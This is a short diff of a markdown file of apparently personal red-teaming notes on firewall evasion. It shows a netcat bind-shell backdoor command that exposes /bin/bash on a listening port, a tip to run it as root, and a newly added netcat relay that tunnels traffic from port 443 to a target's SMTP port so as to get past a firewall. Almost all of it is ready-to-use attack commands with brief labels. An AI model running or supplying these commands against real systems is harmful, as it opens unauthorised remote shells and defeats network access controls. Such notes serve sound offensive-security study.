H3llKa1ser/B00t2R00t/Red Teaming/Evasion Techniques/Firewall Evasion.md

 ### Backdoor example: nc -lvnp PORT -e /bin/bash

 ### TIP: run as root to use ports below 1024 with netcat

+# PORT TUNNELING/PORT MAPPING/PORT FORWARDING

+### Example: nc -lvnp 443 -c "nc TARGET_IP 25"

+#### Access the SMTP server via a port that is not blocked by the firewall